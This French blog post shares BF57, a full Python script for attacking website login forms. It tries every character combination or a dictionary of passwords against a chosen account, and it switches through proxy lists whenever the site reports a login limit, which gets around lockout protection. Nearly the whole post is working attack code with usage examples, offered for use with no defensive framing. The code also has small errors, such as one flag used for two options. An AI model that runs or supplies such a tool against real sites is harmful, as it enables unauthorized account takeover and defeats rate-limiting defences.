BF57 Brute Force Web

Rédigé par BeHuman Aucun commentaire
Classé dans : Python, Hack Mots clés : brute force

BF57 permet d'effectué une attaque en force brute avec ou sans dictionnaire.

Exemple de commande:

$ ./bf57 -a http://www.site.truc 8 admin 'login' 'password' 'mot de passe incorrect' 'limite de connexion'

Help:

$ ./bf57 -h
BF57 Brute Force Generator
GNU/GPL v3
BF57 allows a website to attack by brute force or dictionary
Create by Be Human (craft@ckdevelop.org) Options:
    Help: bf57 -h or --help
    Functions:
        letters: bf47 -l or --letters [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        numerics: bf47 -n or --numerics [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        letters and digits: bf47 -ld [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        punctuation: bf47 -p or --punctuation [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        all : bf47 -a or --all [url] [number] [login] [input login] [input password] [error msg] [limit msg]
        manual : bf47 -m or --manual [url] [number] [login] [input login] [input password] [error msg] [limit msg] [strings]
        dictionnary : bf47 -d or --dico [url] [dico] [login] [input login] [input password] [error msg] [limit msg]
    Option:
        use list proxy: bf57 -p or --proxy [file] [loops]
            
    Examples:
        without proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!"
        manual: bf57 -m http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" "azerty"
        with dico: bf57 -d http://site.truc "admin" "log" "pwd" "error!!" "limit!!" ./dico.list
        with proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" -p ./proxy.list 3

#!/usr/bin/env python 
#-*- coding:utf-8 -*- 

import urllib, urllib2, string, sys, os 

intro="""BF57 Brute Force Generator 
GNU/GPL v3 
BF57 allows a website to attack by brute force or dictionary 
Create by Be Human (craft at ckdeveloporg)""" 

class BF57(): 
    def __init__(self): 
        if (len(sys.argv) < 9): 
            if (len(sys.argv) < 2): 
                print("\n[!]Mauvais nombre d\'arguments[!]\n") 
                self.help() 
            else: 
                if sys.argv[1] == "-h" or sys.argv[1] == "--help": 
                    self.help() 
                else: 
                    print("\n[!]Mauvais nombre d\'arguments[!]\n") 
                    self.help() 
        else: 
            #white=string.whitespace 
            white=' ' 
            letters=string.letters 
            digits=string.digits 
            puncts=string.punctuation 
            specs=u"àâäéèêëîïôöûüùçÀÂÄÉÈÊËÎÏÔÖÙÇ" 
            self.url=sys.argv[2] 
            self.cnt=0 
            self.manu=False 
            if sys.argv[1] == "-l" or sys.argv[1] == "--letters": 
                self.dico="%s%s%s"%( letters, specs, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-n" or sys.argv[1] == "--numerics": 
                self.dico="%s%s"%( digits, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-ld": 
                self.dico="%s%s%s%s"%( letters, specs, digits, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-p" or sys.argv[1] == "--punctuation": 
                dico="%s%s"%( puncts, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-a" or sys.argv[1] == "--all": 
                self.dico="%s%s%s%s%s"%( letters, specs, digits, puncts, white ) 
                self.BruteForce() 
            elif sys.argv[1] == "-m" or sys.argv[1] == "--manual": 
                self.manu=True 
                self.dico=sys.argv[7] 
                self.BruteForce() 
            elif sys.argv[1] == "-d" or sys.argv[1] == "--dico": 
                self.DicoAttack() 
                 
            else: 
                print("\n[!]Option inconnu[!]\n") 
                self.help() 

    def DicoAttack(self): 
        self.fdico = open(sys.argv[8],'r') 
        #self.dictionary=[] 
        self.useproxy=False 
        if (len(sys.argv) > 9): 
            if sys.argv[9] == "-p" or sys.argv[9] == "--proxy": 
                self.useproxy=True 
                listproxy=sys.argv[10] 
            if self.useproxy: 
                fproxy = open(listproxy,'r') 
                self.adrproxy=[] 
                self.cptproxy=0 
                for lines in fproxy: 
                    self.adrproxy.append(lines.strip('\n')) 
        self.login=sys.argv[3] 
        self.ilogin=sys.argv[4] 
        self.ipwd=sys.argv[5] 
        self.merror=sys.argv[6] 
        self.mlimit=sys.argv[7] 
        for lines in self.fdico: 
            self.data = {self.ilogin: self.login,self.ipwd: lines.strip('\n')} 
            self.request = urllib2.Request(self.url, urllib.urlencode(self.data)) 
            if self.useproxy: 
                proxy = { 'http' : self.adrproxy[self.cptproxy] } 
                proxy_handler = urllib2.ProxyHandler(proxy) 
                opener = urllib2.build_opener(proxy_handler) 
                attack = opener.open(self.request).read() 
            else: 
                attack = urllib2.urlopen(self.request).read() 
            if self.mlimit in attack: 
                print("Limit") 
                self.cptproxy+=1 
                if self.cptproxy > len(self.adrproxy): 
                    self.cptproxy=0 
            elif self.merror in attack: 
                print(lines.strip('\n')) 
            else: 
                if lines.strip('\n').strip(' ') == '': 
                    pass 
                else: 
                    print("Password: "+lines.strip('\n')) 
                    #self.dictionary.append(lines.strip('\n')) 
                    break 


    def BruteForce(self): 
        maxlen=int(sys.argv[3])+1 
        self.useproxy=False 
        if (len(sys.argv) > 9): 
            if self.manu: 
                if sys.argv[10] == "-p" or sys.argv[10] == "--proxy": 
                    self.useproxy=True 
                    listproxy=sys.argv[11] 
            else: 
                if sys.argv[9] == "-p" or sys.argv[9] == "--proxy": 
                    self.useproxy=True 
                    listproxy=sys.argv[10] 
            if self.useproxy: 
                fproxy = open(listproxy,'r') 
                self.adrproxy=[] 
                self.cptproxy=0 
                for lines in fproxy: 
                    self.adrproxy.append(lines.strip('\n')) 
                     
        self.login=sys.argv[4] 
        self.ilogin=sys.argv[5] 
        self.ipwd=sys.argv[6] 
        self.merror=sys.argv[7] 
        self.mlimit=sys.argv[8] 
         
        for a in range(maxlen): 
            self.allkey('',a) 
             
    def allkey(self, chaine, maxlen): 
        if len(chaine) < maxlen: 
            for b in range(len(self.dico)): 
                self.allkey(chaine+self.dico[b], maxlen) 
        else: 
            if len(chaine) == maxlen: 
                self.data = {self.ilogin: self.login,self.ipwd: chaine} 
                self.request = urllib2.Request(self.url, urllib.urlencode(self.data)) 
                self.pOut(chaine) 
         
    def pOut(self, chaine): 
        self.cnt+=1 
        if self.useproxy: 
            proxy = { 'http' : self.adrproxy[self.cptproxy] } 
            proxy_handler = urllib2.ProxyHandler(proxy) 
            opener = urllib2.build_opener(proxy_handler) 
            attack = opener.open(self.request).read() 
        else: 
            attack = urllib2.urlopen(self.request).read() 
        if self.mlimit in attack: 
            print("Limit") 
            self.cptproxy+=1 
            if self.cptproxy > len(self.adrproxy): 
                self.cptproxy=0 
        elif self.merror in attack: 
            print(chaine) 
        else: 
            print("Password: "+chaine) 
         
    def help(self): 
        print(intro+"""\n\nOptions: 
    Help: bf57 -h or --help 
    Functions: 
        letters: bf47 -l or --letters [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        numerics: bf47 -n or --numerics [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        letters and digits: bf47 -ld [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        punctuation: bf47 -p or --punctuation [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        all : bf47 -a or --all [url] [number] [login] [input login] [input password] [error msg] [limit msg] 
        manual : bf47 -m or --manual [url] [number] [login] [input login] [input password] [error msg] [limit msg] [strings] 
        dictionnary : bf47 -d or --dico [url] [dico] [login] [input login] [input password] [error msg] [limit msg] 
    Option: 
        use list proxy: bf57 -p or --proxy [file] [loops] 
             
    Examples: 
        without proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" 
        manual: bf57 -m http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" "azerty" 
        with dico: bf57 -d http://site.truc "admin" "log" "pwd" "error!!" "limit!!" ./dico.list 
        with proxy: bf57 -a http://site.truc 5 "admin" "log" "pwd" "error!!" "limit!!" -p ./proxy.list 3\n""") 
         
BF57()

 

 

 

Écrire un commentaire

Quelle est la troisième lettre du mot dxhni ?

Fil RSS des commentaires de cet article